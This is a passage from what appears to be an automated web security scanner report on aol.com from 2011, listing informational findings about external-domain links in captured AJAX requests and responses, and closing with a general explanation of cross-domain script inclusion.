Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl11

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:47 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-52.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2541
Set-Cookie: JSESSIONID=0E9A2D9FF49F6A3CFF3BA67A357AE190; Path=/aol
Content-Length: 2541

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl11 plid-87530 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl11_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl11|sec1_lnk1|87530" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/"><img height="217" alt="Social Security Check" width="386" src="http://o.aolcdn.com/hss/storage/adam/2e56853d2d4dd52493a23f6b837ff837/treasury-check-386mh062911.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl11_hdln" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl11|sec1_lnk2|87530">14,000 People Dead ... on Accident

</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl11_cpy" href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl11|sec1_lnk3|87530">Signs you were affected by mistake
</a>
...[SNIP]...
<li ><a name="om_dl11_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl11|sec3_lnk1|87530" href="http://www.huffingtonpost.com/2011/08/18/wall-street-sell-off_n_930510.html">Dow Sent Into a Freefall</a>
...[SNIP]...
<li ><a name="om_dl11_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl11|sec3_lnk2|87530" href="http://www.huffingtonpost.com/2011/08/17/charinez-jefferson-pregna_n_929165.html?">Pregnant Mom Killed, Baby Lives</a>
...[SNIP]...
<li ><a name="om_dl11_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl11|sec3_lnk3|87530" href="http://www.huffingtonpost.com/2011/08/18/bad-hair-bandit-cynthia-v_n_930333.html?ir=Crime">Alleged 'Bad Hair Bandit' Arrested</a>
...[SNIP]...

6.23. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=8&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-91.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2509
Set-Cookie: JSESSIONID=18ED7455EE75E00DE6B9FB9F5B816AFC; Path=/aol
Content-Length: 2509

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl8 plid-87557 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl8_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl8|sec1_lnk1|87557" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589 "><img height="217" alt="Rapping Teachers" width="386" src="http://o.aolcdn.com/hss/storage/adam/ecb0af04c26491f7ca5cd442334300f9/teacher-hip-hopping-info-passing-regents-386kk.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl8_hdln" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl8|sec1_lnk2|87557">Teachers' Tactic Is Unconventional</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl8_cpy" href="http://www.huffingtonpost.com/2011/08/18/students-passing-regents-_n_930582.html?1313689589 " class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl8|sec1_lnk3|87557">Method has grades 'rapidly rising' </a>
...[SNIP]...
<li ><a name="om_dl8_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl8|sec3_lnk1|87557" href="http://www.huffingtonpost.com/birute-regine/wall-stree-retrothe-two-q_b_929247.html">Interviewer's 2 Shocking Questions</a>
...[SNIP]...
<li ><a name="om_dl8_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl8|sec3_lnk2|87557" href="http://www.huffingtonpost.com/robert-hughes/should-reconciliation-ser_b_927937.html">5 Words That Can Save a Marriage</a>
...[SNIP]...
<li ><a name="om_dl8_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl8|sec3_lnk3|87557" href="http://www.huffingtonpost.com/dr-mark-hyman/get-energy-tips_b_925003.html">How to Boost Your Energy in Life</a>
...[SNIP]...

6.24. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=24&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl24

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:14 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-61.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2423
Set-Cookie: JSESSIONID=1F460CAABB346DA8C8AA4976548BD2D8; Path=/aol
Content-Length: 2423

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl24 plid-87341 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
<a id="dlimg" name="om_dl24_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl24|sec1_lnk1|87341" href="http://www.aol.com/2011/08/17/diaz-chacon-thwarts-kidnapping_n_929090.html"><img height="217" alt="Antonio Diaz Chacon" width="386" src="http://portal.aolcdn.com/p5/forms/1864/d8ff891d-e6e7-4bcc-80d9-074698d52bd2.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl24_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl24|sec3_lnk1|87341" href="http://www.huffingtonpost.com/2011/08/17/not-guilty-ame-deal_n_929897.html">Family Pleads in Girl's Popsicle Death</a>
...[SNIP]...
<li ><a name="om_dl24_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl24|sec3_lnk2|87341" href="http://www.huffingtonpost.com/2011/08/17/meth-bust-tombstones-foun_n_929355.html">Surprising Find at Meth Bust</a>
...[SNIP]...

6.25. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=23&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl23

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:03 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-56.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2517
Set-Cookie: JSESSIONID=7395E03458A480AF327A9596BAA6AACB; Path=/aol
Content-Length: 2517

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl23 plid-87452 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl23_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl23|sec1_lnk1|87452" href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html"><img height="217" alt="S&P" width="386" src="http://i.huffpost.com/gen/332233/thumbs/a-SP-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl23_hdln" onclick=" " href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl23|sec1_lnk2|87452">S&P Under Fire for Bad Ratings</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl23_cpy" href="http://www.huffingtonpost.com/2011/08/18/standard-poors-investigation-mortgage-ratings_n_930237.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl23|sec1_lnk3|87452">How they might have profited big time</a>
...[SNIP]...
<li ><a name="om_dl23_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl23|sec3_lnk1|87452" href="http://www.huffingtonpost.com/2011/08/18/bp-sheen-gulf-mexico_n_930156.html">Another BP Oil Spill?
</a>
...[SNIP]...
<li ><a name="om_dl23_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl23|sec3_lnk2|87452" href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html">O'Donnell Storms Out of Interview</a>
...[SNIP]...
<li ><a name="om_dl23_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl23|sec3_lnk3|87452" href="http://www.huffingtonpost.com/2011/08/17/david-letterman-death-threat-al-qaeda_n_929656.html">Letterman's Jihadist Death Threat</a>
...[SNIP]...

6.26. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=6&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl6

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:50 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2448
Set-Cookie: JSESSIONID=A02527ABEC4259041FFDEB197F860A5E; Path=/aol
Content-Length: 2448

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl6 plid-87569 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
<a id="dlimg" name="om_dl6_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl6|sec1_lnk1|87569" href="http://news.travel.aol.com/2011/08/18/gma-picks-most-beautiful-place-in-america/"><img height="217" alt="The Most Beautiful Place in America" width="386" src="http://o.aolcdn.com/hss/storage/adam/cb8bf36e344127187bde3be2fce5c563/dunes-386az08182011.jpg"/></a>
...[SNIP]...
<li ><a name="om_dl6_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl6|sec3_lnk1|87569" href="http://www.gadling.com/2011/08/18/inside-donald-trumps-757/">Inside Donald Trump's Airplane</a>
...[SNIP]...

6.27. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=5&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl4

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:01 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-35.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2579
Set-Cookie: JSESSIONID=B7808C4FF405B2653EF6C3098379C942; Path=/aol
Content-Length: 2579

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl5 plid-87399 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...
</span>
<a id="dlimg" name="om_dl5_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl5|sec1_lnk1|87399" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/"><img height="217" alt="Secret to Saving on Diamond Ring" width="386" src="http://o.aolcdn.com/hss/storage/adam/dd176a4a16b8a6c303340f54cab9cdf6/ring-386az08172011.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl5_hdln" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl5|sec1_lnk2|87399">Secrets to Buying a Diamond Ring


</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl5_cpy" href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl5|sec1_lnk3|87399">Minimum amount you should pay

</a>
...[SNIP]...
<li ><a name="om_dl5_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl5|sec3_lnk1|87399" href="http://www.dailyfinance.com/2011/08/09/savings-experiment-how-to-get-a-sun-kissed-look-for-less/">Affordable Way to Keep Your Tan
</a>
...[SNIP]...
<li ><a name="om_dl5_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl5|sec3_lnk2|87399" href="http://www.dailyfinance.com/2011/08/02/savings-experiment-how-to-save-money-on-a-mattress/">Mattress-Buying Mistake to Avoid</a>
...[SNIP]...
<li ><a name="om_dl5_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl5|sec3_lnk3|87399" href="http://www.dailyfinance.com/2011/06/07/savings-experiment-pay-less-for-household-paper-products/">How to Save More on Toilet Paper
</a>
...[SNIP]...

6.28. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=17&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl17

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:55 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-84.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2489
Set-Cookie: JSESSIONID=EB9AAF2FD000BB7CD4B1C4F6E469B243; Path=/aol
Content-Length: 2489

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl17 plid-87443 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl17_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl17|sec1_lnk1|87443" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html"><img height="217" alt="Sam Volpendesto" width="386" src="http://i.huffpost.com/gen/332221/thumbs/a-SAM-VOLPENDESTO-386x217.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl17_hdln" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl17|sec1_lnk2|87443">Former War Hero Sentenced to 35 Years
</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl17_cpy" href="http://www.huffingtonpost.com/2011/08/17/sam-volpendesto-war-hero-_n_930028.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl17|sec1_lnk3|87443">Violent crimes he committed</a>
...[SNIP]...
<li ><a name="om_dl17_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl17|sec3_lnk1|87443" href="http://www.huffingtonpost.com/2011/08/18/ayen-chol-girl-killed-australia-dog_n_930219.html">Girl, 4, Killed by Neighbor's Dog

</a>
...[SNIP]...
<li ><a name="om_dl17_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl17|sec3_lnk2|87443" href="http://www.huffingtonpost.com/2011/08/17/robert-michael-hoffman-arrested-craigslist-sexual-assaults_n_929974.html">Attorney Arrested on Rape Charges

</a>
...[SNIP]...
<li ><a name="om_dl17_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl17|sec3_lnk3|87443" href="http://www.huffingtonpost.com/2011/08/17/vatican-abuse-files_n_929234.html">Vatican Releases Sexual Abuse Files

</a>
...[SNIP]...

6.29. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=25&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Referer: http://www.aol.com/
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1313705645120-New%7C1376777645120%3B%20s_nrgvo%3DNew%7C1376777645122%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; CUNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b; rrpmo1=rr1~1~1313705624439~0; stips5=1; dlact=dl25

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:18:26 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-43.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2484
Set-Cookie: JSESSIONID=F04887713108D52DA6272E7118597A0B; Path=/aol
Content-Length: 2484

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl25 plid-87351 display-lightbox">
<span class="dn" id="dl-vid"><
...[SNIP]...
</span>
<a id="dlimg" name="om_dl25_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl25|sec1_lnk1|87351" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html"><img height="217" alt="President Barack Obama" width="386" src="http://portal.aolcdn.com/p5/forms/1865/ac4c6e8e-ec37-4ad9-94ea-23ba91b148cf.jpg"/></a>
...[SNIP]...
<h2><a name="om_dl25_hdln" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html" class=" lnid-sec1_lnk2 icid-maing-grid7|main5|dl25|sec1_lnk2|87351">Obama's Approval Hits All-Time Low</a>
...[SNIP]...
<p class="lede-link"><a name="om_dl25_cpy" href="http://www.huffingtonpost.com/2011/08/17/obama-job-approval-economy_n_929850.html" class=" lnid-sec1_lnk3 icid-maing-grid7|main5|dl25|sec1_lnk3|87351">The number he'd rather not see</a>
...[SNIP]...
<li ><a name="om_dl25_slede1" class="dl-sublede-link bold lnid-sec3_lnk1 icid-maing-grid7|main5|dl25|sec3_lnk1|87351" href="http://www.huffingtonpost.com/2011/08/17/1-hour-of-tv-lifespan-22-minutes_n_929321.html">Watching TV as Harmful as Smoking</a>
...[SNIP]...
<li ><a name="om_dl25_slede2" class="dl-sublede-link bold lnid-sec3_lnk2 icid-maing-grid7|main5|dl25|sec3_lnk2|87351" href="http://www.huffingtonpost.com/2011/08/17/kentucky-penis-amputation_n_929948.html">Man's Penis 'Unnecessarily Amputated'</a>
...[SNIP]...
<li ><a name="om_dl25_slede3" class="dl-sublede-link bold lnid-sec3_lnk3 icid-maing-grid7|main5|dl25|sec3_lnk3|87351" href="http://www.huffingtonpost.com/2011/08/17/ed-schultz-apologizes-rick-perry_n_929066.html">MSNBC Host Apologizes for 'Racist' Clip</a>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

